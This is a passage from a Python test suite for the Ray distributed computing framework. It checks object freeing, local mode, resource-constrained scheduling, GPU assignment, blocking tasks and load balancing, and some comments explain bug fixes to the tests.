                    time.sleep(random.randint(0, 10) / 1000.0)
            except Exception as e:
                with self.lock:
                    self.thread_results.append(e)
            else:
                with self.lock:
                    self.thread_results.append("ok")

        def spawn(self):
            wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
            self.threads = [
                threading.Thread(
                    target=self.background_thread, args=(wait_objects, ))
                for _ in range(20)
            ]
            [thread.start() for thread in self.threads]

        def join(self):
            [thread.join() for thread in self.threads]
            assert self.thread_results == ["ok"] * len(self.threads)
            return "ok"

    actor = MultithreadedActor.remote()
    actor.spawn.remote()
    # BUG FIX: the original line discarded the comparison result
    # (`ray.get(...) == "ok"` with no assert), so a failed join -- i.e. an
    # error raised in any background thread -- went unnoticed.
    assert ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
    """ray.internal.free() deletes objects locally or cluster-wide as asked."""
    # This test will do following:
    # 1. Create 3 raylets that each hold an actor.
    # 2. Each actor creates an object which is the deletion target.
    # 3. Wait 0.1 second for the objects to be deleted.
    # 4. Check that the deletion targets have been deleted.
    # Caution: if remote functions are used instead of actor methods,
    # one raylet may create more than one worker to execute the
    # tasks, so the flushing operations may be executed in different
    # workers and the plasma client holding the deletion target
    # may not be flushed.
    cluster = ray_start_cluster
    config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
    for i in range(3):
        cluster.add_node(
            num_cpus=1,
            resources={"Custom{}".format(i): 1},
            _internal_config=config)
    ray.init(address=cluster.address)

    class RawActor(object):
        def get(self):
            return ray.worker.global_worker.node.unique_id

    # Pin one actor to each of the three nodes via its custom resource.
    ActorOnNode0 = ray.remote(resources={"Custom0": 1})(RawActor)
    ActorOnNode1 = ray.remote(resources={"Custom1": 1})(RawActor)
    ActorOnNode2 = ray.remote(resources={"Custom2": 1})(RawActor)

    def create(actors):
        # Produce one object per node and wait for all three to be ready.
        a = actors[0].get.remote()
        b = actors[1].get.remote()
        c = actors[2].get.remote()
        (l1, l2) = ray.wait([a, b, c], num_returns=3)
        assert len(l1) == 3
        assert len(l2) == 0
        return (a, b, c)

    def run_one_test(actors, local_only, delete_creating_tasks):
        (a, b, c) = create(actors)
        # The three objects should be generated on different object stores.
        assert ray.get(a) != ray.get(b)
        assert ray.get(a) != ray.get(c)
        assert ray.get(c) != ray.get(b)
        ray.internal.free(
            [a, b, c],
            local_only=local_only,
            delete_creating_tasks=delete_creating_tasks)
        # Wait for the objects to be deleted.
        time.sleep(0.1)
        return (a, b, c)

    actors = [
        ActorOnNode0.remote(),
        ActorOnNode1.remote(),
        ActorOnNode2.remote()
    ]
    # Case 1: run this local_only=False. All 3 objects will be deleted.
    (a, b, c) = run_one_test(actors, False, False)
    (l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
    # All the objects are deleted.
    assert len(l1) == 0
    assert len(l2) == 3
    # Case 2: run this local_only=True. Only 1 object will be deleted.
    (a, b, c) = run_one_test(actors, True, False)
    (l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
    # One object is deleted and 2 objects are not.
    assert len(l1) == 2
    assert len(l2) == 1
    # The deleted object will have the same store with the driver.
    local_return = ray.worker.global_worker.node.unique_id
    for object_id in l1:
        assert ray.get(object_id) != local_return

    # Case3: These cases test the deleting creating tasks for the object.
    (a, b, c) = run_one_test(actors, False, False)
    task_table = ray.tasks()
    for obj in [a, b, c]:
        assert ray._raylet.compute_task_id(obj).hex() in task_table

    (a, b, c) = run_one_test(actors, False, True)
    task_table = ray.tasks()
    for obj in [a, b, c]:
        assert ray._raylet.compute_task_id(obj).hex() not in task_table
def test_local_mode(shutdown_only):
    """End-to-end check of LOCAL_MODE semantics: tasks, actors, and errors."""

    @ray.remote
    def local_mode_f():
        return np.array([0, 0])

    @ray.remote
    def local_mode_g(x):
        x[0] = 1
        return x

    ray.init(local_mode=True)

    @ray.remote
    def f():
        return np.ones([3, 4, 5])

    xref = f.remote()
    # Remote functions should return ObjectIDs.
    assert isinstance(xref, ray.ObjectID)
    assert np.alltrue(ray.get(xref) == np.ones([3, 4, 5]))
    y = np.random.normal(size=[11, 12])
    # Check that ray.get(ray.put) is the identity.
    assert np.alltrue(y == ray.get(ray.put(y)))

    # Make sure objects are immutable, this example is why we need to copy
    # arguments before passing them into remote functions in python mode
    aref = local_mode_f.remote()
    assert np.alltrue(ray.get(aref) == np.array([0, 0]))
    bref = local_mode_g.remote(ray.get(aref))
    # Make sure local_mode_g does not mutate aref.
    assert np.alltrue(ray.get(aref) == np.array([0, 0]))
    assert np.alltrue(ray.get(bref) == np.array([1, 0]))

    # wait should return the first num_returns values passed in as the
    # first list and the remaining values as the second list
    num_returns = 5
    object_ids = [ray.put(i) for i in range(20)]
    ready, remaining = ray.wait(
        object_ids, num_returns=num_returns, timeout=None)
    assert ready == object_ids[:num_returns]
    assert remaining == object_ids[num_returns:]

    # Check that ray.put() and ray.internal.free() work in local mode.
    v1 = np.ones(10)
    v2 = np.zeros(10)

    k1 = ray.put(v1)
    assert np.alltrue(v1 == ray.get(k1))
    k2 = ray.put(v2)
    assert np.alltrue(v2 == ray.get(k2))

    ray.internal.free([k1, k2])
    with pytest.raises(Exception):
        ray.get(k1)
    with pytest.raises(Exception):
        ray.get(k2)

    # Should fail silently.
    ray.internal.free([k1, k2])

    # Test actors in LOCAL_MODE.
    @ray.remote
    class LocalModeTestClass(object):
        def __init__(self, array):
            self.array = array

        def set_array(self, array):
            self.array = array

        def get_array(self):
            return self.array

        def modify_and_set_array(self, array):
            array[0] = -1
            self.array = array

        @ray.method(num_return_vals=3)
        def returns_multiple(self):
            return 1, 2, 3

    test_actor = LocalModeTestClass.remote(np.arange(10))
    obj = test_actor.get_array.remote()
    assert isinstance(obj, ray.ObjectID)
    assert np.alltrue(ray.get(obj) == np.arange(10))

    test_array = np.arange(10)
    # Remote actor functions should not mutate arguments
    test_actor.modify_and_set_array.remote(test_array)
    assert np.alltrue(test_array == np.arange(10))
    # Remote actor functions should keep state
    test_array[0] = -1
    assert np.alltrue(test_array == ray.get(test_actor.get_array.remote()))

    # Check that actor handles work in local mode.
    @ray.remote
    def use_actor_handle(handle):
        array = np.ones(10)
        handle.set_array.remote(array)
        assert np.alltrue(array == ray.get(handle.get_array.remote()))

    ray.get(use_actor_handle.remote(test_actor))

    # Check that exceptions are deferred until ray.get().
    exception_str = "test_basic remote task exception"

    @ray.remote
    def throws():
        raise Exception(exception_str)

    obj = throws.remote()
    with pytest.raises(Exception, match=exception_str):
        ray.get(obj)

    # Check that multiple return values are handled properly.
    @ray.remote(num_return_vals=3)
    def returns_multiple():
        return 1, 2, 3

    obj1, obj2, obj3 = returns_multiple.remote()
    assert ray.get(obj1) == 1
    assert ray.get(obj2) == 2
    assert ray.get(obj3) == 3
    assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]

    obj1, obj2, obj3 = test_actor.returns_multiple.remote()
    assert ray.get(obj1) == 1
    assert ray.get(obj2) == 2
    assert ray.get(obj3) == 3
    assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]

    @ray.remote(num_return_vals=2)
    def returns_multiple_throws():
        raise Exception(exception_str)

    obj1, obj2 = returns_multiple_throws.remote()
    # BUG FIX: the original called `ray.get(obj)` (the earlier, unrelated
    # ID from `throws`) first inside this context manager; that call raised,
    # so the following `ray.get(obj1)` was dead code and obj1 was never
    # actually checked. Each ID now gets its own pytest.raises block.
    with pytest.raises(Exception, match=exception_str):
        ray.get(obj1)
    with pytest.raises(Exception, match=exception_str):
        ray.get(obj2)

    # Check that Actors are not overwritten by remote calls from different
    # classes.
    @ray.remote
    class RemoteActor1(object):
        def __init__(self):
            pass

        def function1(self):
            return 0

    @ray.remote
    class RemoteActor2(object):
        def __init__(self):
            pass

        def function2(self):
            return 1

    actor1 = RemoteActor1.remote()
    _ = RemoteActor2.remote()
    assert ray.get(actor1.function1.remote()) == 0
def test_resource_constraints(shutdown_only):
    """CPU/GPU limits bound how many copies of a task run concurrently."""
    num_workers = 20
    ray.init(num_cpus=10, num_gpus=2)

    @ray.remote(num_cpus=0)
    def get_worker_id():
        time.sleep(0.1)
        return os.getpid()

    # Attempt to wait for all of the workers to start up.
    while True:
        if len(
                set(
                    ray.get([
                        get_worker_id.remote() for _ in range(num_workers)
                    ]))) == num_workers:
            break

    # Slack allowed on each wall-clock measurement below.
    time_buffer = 2

    # At most 10 copies of this can run at once.
    @ray.remote(num_cpus=1)
    def f(n):
        time.sleep(n)

    # 10 tasks fit concurrently -> one 0.5s round.
    start_time = time.time()
    ray.get([f.remote(0.5) for _ in range(10)])
    duration = time.time() - start_time
    assert duration < 0.5 + time_buffer
    assert duration > 0.5

    # 11 tasks need two rounds -> at least 1s.
    start_time = time.time()
    ray.get([f.remote(0.5) for _ in range(11)])
    duration = time.time() - start_time
    assert duration < 1 + time_buffer
    assert duration > 1

    @ray.remote(num_cpus=3)
    def f(n):
        time.sleep(n)

    # num_cpus=3 with 10 CPUs -> at most 3 concurrent copies.
    start_time = time.time()
    ray.get([f.remote(0.5) for _ in range(3)])
    duration = time.time() - start_time
    assert duration < 0.5 + time_buffer
    assert duration > 0.5

    start_time = time.time()
    ray.get([f.remote(0.5) for _ in range(4)])
    duration = time.time() - start_time
    assert duration < 1 + time_buffer
    assert duration > 1

    @ray.remote(num_gpus=1)
    def f(n):
        time.sleep(n)

    # num_gpus=1 with 2 GPUs -> at most 2 concurrent copies.
    start_time = time.time()
    ray.get([f.remote(0.5) for _ in range(2)])
    duration = time.time() - start_time
    assert duration < 0.5 + time_buffer
    assert duration > 0.5

    start_time = time.time()
    ray.get([f.remote(0.5) for _ in range(3)])
    duration = time.time() - start_time
    assert duration < 1 + time_buffer
    assert duration > 1

    start_time = time.time()
    ray.get([f.remote(0.5) for _ in range(4)])
    duration = time.time() - start_time
    assert duration < 1 + time_buffer
    assert duration > 1
def test_multi_resource_constraints(shutdown_only):
    """Tasks requiring both CPUs and GPUs are scheduled within both limits."""
    num_workers = 20
    ray.init(num_cpus=10, num_gpus=10)

    @ray.remote(num_cpus=0)
    def get_worker_id():
        time.sleep(0.1)
        return os.getpid()

    # Attempt to wait for all of the workers to start up.
    while True:
        if len(
                set(
                    ray.get([
                        get_worker_id.remote() for _ in range(num_workers)
                    ]))) == num_workers:
            break

    # f and g have complementary requirements: one of each can run at the
    # same time, but two of either kind cannot.
    @ray.remote(num_cpus=1, num_gpus=9)
    def f(n):
        time.sleep(n)

    @ray.remote(num_cpus=9, num_gpus=1)
    def g(n):
        time.sleep(n)

    # Slack allowed on each wall-clock measurement below.
    time_buffer = 2

    start_time = time.time()
    ray.get([f.remote(0.5), g.remote(0.5)])
    duration = time.time() - start_time
    assert duration < 0.5 + time_buffer
    assert duration > 0.5

    start_time = time.time()
    ray.get([f.remote(0.5), f.remote(0.5)])
    duration = time.time() - start_time
    assert duration < 1 + time_buffer
    assert duration > 1

    start_time = time.time()
    ray.get([g.remote(0.5), g.remote(0.5)])
    duration = time.time() - start_time
    assert duration < 1 + time_buffer
    assert duration > 1

    start_time = time.time()
    ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
    duration = time.time() - start_time
    assert duration < 1 + time_buffer
    assert duration > 1
def test_gpu_ids(shutdown_only):
    """GPU IDs and CUDA_VISIBLE_DEVICES are assigned consistently."""
    num_gpus = 10
    ray.init(num_cpus=10, num_gpus=num_gpus)

    def get_gpu_ids(num_gpus_per_worker):
        # A worker must see exactly the GPUs allocated to it, mirrored into
        # CUDA_VISIBLE_DEVICES, and all IDs must be valid.
        time.sleep(0.1)
        gpu_ids = ray.get_gpu_ids()
        assert len(gpu_ids) == num_gpus_per_worker
        assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
            [str(i) for i in gpu_ids]))
        for gpu_id in gpu_ids:
            assert gpu_id in range(num_gpus)
        return gpu_ids

    f0 = ray.remote(num_gpus=0)(lambda: get_gpu_ids(0))
    f1 = ray.remote(num_gpus=1)(lambda: get_gpu_ids(1))
    f2 = ray.remote(num_gpus=2)(lambda: get_gpu_ids(2))
    f4 = ray.remote(num_gpus=4)(lambda: get_gpu_ids(4))
    f5 = ray.remote(num_gpus=5)(lambda: get_gpu_ids(5))

    # Wait for all workers to start up.
    @ray.remote
    def f():
        time.sleep(0.1)
        return os.getpid()

    start_time = time.time()
    while True:
        if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
            break
        if time.time() > start_time + 10:
            raise RayTestTimeoutException(
                "Timed out while waiting for workers to start "
                "up.")

    list_of_ids = ray.get([f0.remote() for _ in range(10)])
    assert list_of_ids == 10 * [[]]

    # Ten 1-GPU tasks should collectively cover all ten distinct GPUs.
    list_of_ids = ray.get([f1.remote() for _ in range(10)])
    set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
    assert set_of_ids == {(i, ) for i in range(10)}

    # 2 + 4 + 4 GPUs running concurrently must partition all ten GPUs.
    list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
    all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
    assert set(all_ids) == set(range(10))

    # There are only 10 GPUs, and each task uses 5 GPUs, so there should only
    # be 2 tasks scheduled at a given time.
    t1 = time.time()
    ray.get([f5.remote() for _ in range(20)])
    assert time.time() - t1 >= 10 * 0.1

    # Test that actors have CUDA_VISIBLE_DEVICES set properly.
    @ray.remote
    class Actor0(object):
        def __init__(self):
            gpu_ids = ray.get_gpu_ids()
            assert len(gpu_ids) == 0
            assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
                [str(i) for i in gpu_ids]))
            # Set self.x to make sure that we got here.
            self.x = 1

        def test(self):
            gpu_ids = ray.get_gpu_ids()
            assert len(gpu_ids) == 0
            assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
                [str(i) for i in gpu_ids]))
            return self.x

    @ray.remote(num_gpus=1)
    class Actor1(object):
        def __init__(self):
            gpu_ids = ray.get_gpu_ids()
            assert len(gpu_ids) == 1
            assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
                [str(i) for i in gpu_ids]))
            # Set self.x to make sure that we got here.
            self.x = 1

        def test(self):
            gpu_ids = ray.get_gpu_ids()
            assert len(gpu_ids) == 1
            assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
                [str(i) for i in gpu_ids]))
            return self.x

    a0 = Actor0.remote()
    ray.get(a0.test.remote())

    a1 = Actor1.remote()
    ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
    """Tasks and actors requesting zero CPUs run even with no CPUs available."""
    ray.init(num_cpus=0)

    # We should be able to execute a task that requires 0 CPU resources.
    @ray.remote(num_cpus=0)
    def f():
        return 1

    ray.get(f.remote())

    # We should be able to create an actor that requires 0 CPU resources.
    @ray.remote(num_cpus=0)
    class Actor(object):
        def method(self):
            pass

    actor = Actor.remote()
    ray.get(actor.method.remote())
def test_zero_cpus_actor(ray_start_cluster):
    """An actor must not be scheduled on the CPU-less head node."""
    cluster = ray_start_cluster
    cluster.add_node(num_cpus=0)
    cluster.add_node(num_cpus=2)
    ray.init(address=cluster.address)

    local_node_id = ray.worker.global_worker.node.unique_id

    @ray.remote
    class Foo(object):
        def method(self):
            return ray.worker.global_worker.node.unique_id

    # The driver sits on the zero-CPU node, so the actor must land elsewhere.
    foo = Foo.remote()
    assert ray.get(foo.method.remote()) != local_node_id
def test_fractional_resources(shutdown_only):
    """Fractional resource requests pack correctly and reject values > 1."""
    ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})

    @ray.remote(num_gpus=0.5)
    class Foo1(object):
        def method(self):
            gpu_ids = ray.get_gpu_ids()
            assert len(gpu_ids) == 1
            return gpu_ids[0]

    # Six half-GPU actors on 3 GPUs: each GPU hosts exactly two actors.
    foos = [Foo1.remote() for _ in range(6)]
    gpu_ids = ray.get([f.method.remote() for f in foos])
    for i in range(3):
        assert gpu_ids.count(i) == 2
    del foos

    @ray.remote
    class Foo2(object):
        def method(self):
            pass

    # Create an actor that requires 0.7 of the custom resource.
    f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
    ray.get(f1.method.remote())
    # Make sure that we cannot create an actor that requires 0.7 of the
    # custom resource. TODO(rkn): Re-enable this once ray.wait is
    # implemented.
    f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
    ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
    assert len(ready) == 0
    # Make sure we can start an actor that requires only 0.3 of the custom
    # resource.
    f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
    ray.get(f3.method.remote())

    del f1, f3

    # Make sure that we get exceptions if we submit tasks that require a
    # fractional number of resources greater than 1.

    @ray.remote(num_cpus=1.5)
    def test():
        pass

    with pytest.raises(ValueError):
        test.remote()

    with pytest.raises(ValueError):
        Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_raylets(ray_start_cluster):
    """Check that resource-constrained tasks land on the expected raylets.

    Three nodes with distinct CPU/GPU capacities are started; each remote
    function's resource demand is only satisfiable on a known subset of the
    nodes, and the plasma store socket name returned by each task identifies
    the node it actually ran on.
    """
    # This test will define a bunch of tasks that can only be assigned to
    # specific raylets, and we will check that they are assigned
    # to the correct raylets.
    cluster = ray_start_cluster
    cluster.add_node(num_cpus=11, num_gpus=0)
    cluster.add_node(num_cpus=5, num_gpus=5)
    cluster.add_node(num_cpus=10, num_gpus=1)
    ray.init(address=cluster.address)
    cluster.wait_for_nodes()

    # Define a bunch of remote functions that all return the socket name of
    # the plasma store. Since there is a one-to-one correspondence between
    # plasma stores and raylets (at least right now), this can be
    # used to identify which raylet the task was assigned to.

    # This must be run on the zeroth raylet.
    @ray.remote(num_cpus=11)
    def run_on_0():
        return ray.worker.global_worker.node.plasma_store_socket_name

    # This must be run on the first raylet.
    @ray.remote(num_gpus=2)
    def run_on_1():
        return ray.worker.global_worker.node.plasma_store_socket_name

    # This must be run on the second raylet.
    @ray.remote(num_cpus=6, num_gpus=1)
    def run_on_2():
        return ray.worker.global_worker.node.plasma_store_socket_name

    # This can be run anywhere.
    @ray.remote(num_cpus=0, num_gpus=0)
    def run_on_0_1_2():
        return ray.worker.global_worker.node.plasma_store_socket_name

    # This must be run on the first or second raylet.
    @ray.remote(num_gpus=1)
    def run_on_1_2():
        return ray.worker.global_worker.node.plasma_store_socket_name

    # This must be run on the zeroth or second raylet.
    @ray.remote(num_cpus=8)
    def run_on_0_2():
        return ray.worker.global_worker.node.plasma_store_socket_name

    def run_lots_of_tasks():
        # Submit 100 randomly-chosen tasks and remember which constraint
        # each one was submitted under.
        names = []
        results = []
        for i in range(100):
            index = np.random.randint(6)
            if index == 0:
                names.append("run_on_0")
                results.append(run_on_0.remote())
            elif index == 1:
                names.append("run_on_1")
                results.append(run_on_1.remote())
            elif index == 2:
                names.append("run_on_2")
                results.append(run_on_2.remote())
            elif index == 3:
                names.append("run_on_0_1_2")
                results.append(run_on_0_1_2.remote())
            elif index == 4:
                names.append("run_on_1_2")
                results.append(run_on_1_2.remote())
            elif index == 5:
                names.append("run_on_0_2")
                results.append(run_on_0_2.remote())
        return names, results

    client_table = ray.nodes()
    store_names = []
    # Order store_names as [0-GPU node, 5-GPU node, 1-GPU node] so indices
    # match the run_on_* numbering used above.
    store_names += [
        client["ObjectStoreSocketName"] for client in client_table
        if client["Resources"].get("GPU", 0) == 0
    ]
    store_names += [
        client["ObjectStoreSocketName"] for client in client_table
        if client["Resources"].get("GPU", 0) == 5
    ]
    store_names += [
        client["ObjectStoreSocketName"] for client in client_table
        if client["Resources"].get("GPU", 0) == 1
    ]
    assert len(store_names) == 3

    def validate_names_and_results(names, results):
        # Every task must have run on a raylet allowed by its constraint.
        for name, result in zip(names, ray.get(results)):
            if name == "run_on_0":
                assert result in [store_names[0]]
            elif name == "run_on_1":
                assert result in [store_names[1]]
            elif name == "run_on_2":
                assert result in [store_names[2]]
            elif name == "run_on_0_1_2":
                assert (result in [
                    store_names[0], store_names[1], store_names[2]
                ])
            elif name == "run_on_1_2":
                assert result in [store_names[1], store_names[2]]
            elif name == "run_on_0_2":
                assert result in [store_names[0], store_names[2]]
            else:
                raise Exception("This should be unreachable.")
        assert set(ray.get(results)) == set(store_names)

    names, results = run_lots_of_tasks()
    validate_names_and_results(names, results)

    # Make sure the same thing works when this is nested inside of a task.
    @ray.remote
    def run_nested1():
        names, results = run_lots_of_tasks()
        return names, results

    @ray.remote
    def run_nested2():
        names, results = ray.get(run_nested1.remote())
        return names, results

    names, results = ray.get(run_nested2.remote())
    validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
    """Tasks demanding "CustomResource" must run only on the node that has it."""
    cluster = ray_start_cluster
    # Only the second node provides a non-zero amount of the custom resource.
    cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
    cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
    ray.init(address=cluster.address)

    @ray.remote
    def f():
        time.sleep(0.001)
        return ray.worker.global_worker.node.unique_id

    @ray.remote(resources={"CustomResource": 1})
    def g():
        time.sleep(0.001)
        return ray.worker.global_worker.node.unique_id

    @ray.remote(resources={"CustomResource": 1})
    def h():
        # Block on subtasks while holding the custom resource.
        ray.get([f.remote() for _ in range(5)])
        return ray.worker.global_worker.node.unique_id

    # The f tasks should be scheduled on both raylets.
    assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2

    node_id = ray.worker.global_worker.node.unique_id

    # The g tasks should be scheduled only on the second raylet.
    raylet_ids = set(ray.get([g.remote() for _ in range(50)]))
    assert len(raylet_ids) == 1
    assert list(raylet_ids)[0] != node_id

    # Make sure that resource bookkeeping works when a task that uses a
    # custom resources gets blocked.
    ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
    """Scheduling with two custom resource types spread over two nodes."""
    cluster = ray_start_cluster
    cluster.add_node(
        num_cpus=3, resources={
            "CustomResource1": 1,
            "CustomResource2": 2
        })
    cluster.add_node(
        num_cpus=3, resources={
            "CustomResource1": 3,
            "CustomResource2": 4
        })
    ray.init(address=cluster.address)

    @ray.remote(resources={"CustomResource1": 1})
    def f():
        time.sleep(0.001)
        return ray.worker.global_worker.node.unique_id

    @ray.remote(resources={"CustomResource2": 1})
    def g():
        time.sleep(0.001)
        return ray.worker.global_worker.node.unique_id

    # Satisfiable only on the second node (needs CustomResource2 >= 3).
    @ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
    def h():
        time.sleep(0.001)
        return ray.worker.global_worker.node.unique_id

    # Unsatisfiable: no node has 4 of CustomResource1.
    @ray.remote(resources={"CustomResource1": 4})
    def j():
        time.sleep(0.001)
        return ray.worker.global_worker.node.unique_id

    # Unsatisfiable: CustomResource3 does not exist anywhere in the cluster.
    @ray.remote(resources={"CustomResource3": 1})
    def k():
        time.sleep(0.001)
        return ray.worker.global_worker.node.unique_id

    # The f and g tasks should be scheduled on both raylets.
    assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
    assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2

    node_id = ray.worker.global_worker.node.unique_id

    # The h tasks should be scheduled only on the second raylet.
    raylet_ids = set(ray.get([h.remote() for _ in range(50)]))
    assert len(raylet_ids) == 1
    assert list(raylet_ids)[0] != node_id

    # Make sure that tasks with unsatisfied custom resource requirements do
    # not get scheduled.
    ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
    assert ready_ids == []
def test_many_custom_resources(shutdown_only):
    """Exercise scheduling with a very large number of custom resources.

    Registers 10000 custom resources, then submits tasks whose demands are
    random subsets of them (plus one task with no demand and one demanding
    everything) and waits for all of them to finish.
    """
    resource_count = 10000
    capacities = {
        str(i): np.random.randint(1, 7)
        for i in range(resource_count)
    }
    ray.init(num_cpus=5, resources=capacities)

    def f():
        return 1

    remote_fns = []
    for _ in range(20):
        # Pick a random subset of the resources as this function's demand.
        sample_size = np.random.randint(0, resource_count + 1)
        chosen = np.random.permutation(resource_count)[:sample_size]
        demand = {str(i): capacities[str(i)] for i in chosen}
        remote_fns.append(ray.remote(resources=demand)(f))
    # One function with no custom-resource demand, and one demanding the
    # entire cluster's worth of every resource.
    remote_fns.append(ray.remote(f))
    remote_fns.append(ray.remote(resources=capacities)(f))

    # Submit each function three times and wait for every task.
    object_ids = []
    for fn in remote_fns:
        object_ids.extend(fn.remote() for _ in range(3))
    ray.get(object_ids)
# TODO: 5 retry attempts may be too little for Travis and we may need to
# increase it if this test begins to be flaky on Travis.
def test_zero_capacity_deletion_semantics(shutdown_only):
    """After a task grabs every resource, ray.available_resources() is empty.

    Zero-capacity entries must be deleted from the availability table rather
    than reported with value 0.
    """
    ray.init(num_cpus=2, num_gpus=1, resources={"test_resource": 1})

    def test():
        MAX_RETRY_ATTEMPTS = 5
        for _ in range(MAX_RETRY_ATTEMPTS):
            resources = ray.available_resources()
            # The memory bookkeeping entries are excluded from the emptiness
            # check. BUG FIX: the original deleted these keys only before the
            # retry loop, so every re-read reintroduced them and the retries
            # could never succeed.
            resources.pop("memory", None)
            resources.pop("object_store_memory", None)
            if not resources:
                return resources
            time.sleep(0.1)
        raise RuntimeError(
            "Resources were available even after five retries.")

    # Run `test` as a task that consumes every CPU, every GPU, and the whole
    # custom resource, so nothing should remain available while it runs.
    function = ray.remote(
        num_cpus=2, num_gpus=1, resources={"test_resource": 1})(test)
    cluster_resources = ray.get(function.remote())
    # All cluster resources should be utilized and
    # cluster_resources must be empty
    assert cluster_resources == {}
@pytest.fixture
def save_gpu_ids_shutdown_only():
    """Shut down Ray after the test and restore CUDA_VISIBLE_DEVICES.

    Records the current value of the environment variable so it can be put
    back during teardown, even if the test itself overwrote or set it.
    """
    # Record the current value of this environment variable so that we can
    # reset it after the test.
    original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
    yield None
    # The code after the yield will run as teardown code.
    ray.shutdown()
    # Reset the environment variable.
    if original_gpu_ids is not None:
        os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
    else:
        # pop() instead of del: the variable may never have been set if the
        # test did not export it, and teardown must not raise KeyError.
        os.environ.pop("CUDA_VISIBLE_DEVICES", None)
def test_specific_gpus(save_gpu_ids_shutdown_only):
    """GPU ids handed to tasks must come from CUDA_VISIBLE_DEVICES."""
    allowed_gpu_ids = [4, 5, 6]
    os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
        [str(i) for i in allowed_gpu_ids])
    ray.init(num_gpus=3)

    @ray.remote(num_gpus=1)
    def f():
        gpu_ids = ray.get_gpu_ids()
        assert len(gpu_ids) == 1
        assert gpu_ids[0] in allowed_gpu_ids

    @ray.remote(num_gpus=2)
    def g():
        gpu_ids = ray.get_gpu_ids()
        assert len(gpu_ids) == 2
        assert gpu_ids[0] in allowed_gpu_ids
        assert gpu_ids[1] in allowed_gpu_ids

    ray.get([f.remote() for _ in range(100)])
    ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(ray_start_regular):
    """Tasks that block on ray.get / ray.wait of subtasks must complete."""
    @ray.remote
    def f(i, j):
        return (i, j)

    @ray.remote
    def g(i):
        # Each instance of g submits and blocks on the result of another
        # remote task.
        object_ids = [f.remote(i, j) for j in range(2)]
        return ray.get(object_ids)

    # BUG FIX: g was defined but never invoked, so the ray.get blocking
    # path was not actually exercised.
    ray.get([g.remote(i) for i in range(4)])

    @ray.remote
    def h(i):
        # Each instance of h submits and blocks on the result of another
        # remote task using ray.wait.
        object_ids = [f.remote(i, j) for j in range(2)]
        return ray.wait(object_ids, num_returns=len(object_ids))

    ray.get([h.remote(i) for i in range(4)])

    @ray.remote
    def _sleep(i):
        time.sleep(0.01)
        return (i)

    @ray.remote
    def sleep():
        # Each instance of sleep submits and blocks on the result of
        # another remote task, which takes some time to execute.
        ray.get([_sleep.remote(i) for i in range(10)])

    ray.get(sleep.remote())
def test_max_call_tasks(ray_start_regular):
    """Workers must exit after a remote function reaches its max_calls budget."""
    @ray.remote(max_calls=1)
    def f():
        return os.getpid()

    pid = ray.get(f.remote())
    # The worker that ran f must exit after its single allowed call.
    ray.tests.utils.wait_for_pid_to_exit(pid)

    # Redefine f with a budget of two calls: both should land in the same
    # worker, which then exits.
    @ray.remote(max_calls=2)
    def f():
        return os.getpid()

    pid1 = ray.get(f.remote())
    pid2 = ray.get(f.remote())
    assert pid1 == pid2
    ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
                            args,
                            total_tasks,
                            num_nodes,
                            minimum_count,
                            num_attempts=100):
    """Retry until tasks spread across all nodes with a minimum per-node count.

    Submits ``total_tasks`` invocations of ``remote_function`` and checks
    that all ``num_nodes`` nodes each ran at least ``minimum_count`` of
    them; fails if that never happens within ``num_attempts`` rounds.
    """
    for _ in range(num_attempts):
        locations = ray.get(
            [remote_function.remote(*args) for _ in range(total_tasks)])
        counts = [locations.count(name) for name in set(locations)]
        logger.info("Counts are {}.".format(counts))
        if (len(counts) == num_nodes
                and min(counts) >= minimum_count):
            return
    raise AssertionError("Tasks were never balanced across all nodes.")
def test_load_balancing(ray_start_cluster):
    """Unconstrained tasks should spread roughly evenly over all nodes."""
    # This test ensures that tasks are being assigned to all raylets
    # in a roughly equal manner.
    cluster = ray_start_cluster
    num_nodes = 3
    num_cpus = 7
    for _ in range(num_nodes):
        cluster.add_node(num_cpus=num_cpus)
    ray.init(address=cluster.address)

    @ray.remote
    def f():
        time.sleep(0.01)
        return ray.worker.global_worker.node.unique_id

    attempt_to_load_balance(f, [], 100, num_nodes, 10)
    attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
    """Task spreading must still happen when tasks share a plasma object."""
    # This test ensures that tasks are being assigned to all raylets in a
    # roughly equal manner even when the tasks have dependencies.
    cluster = ray_start_cluster
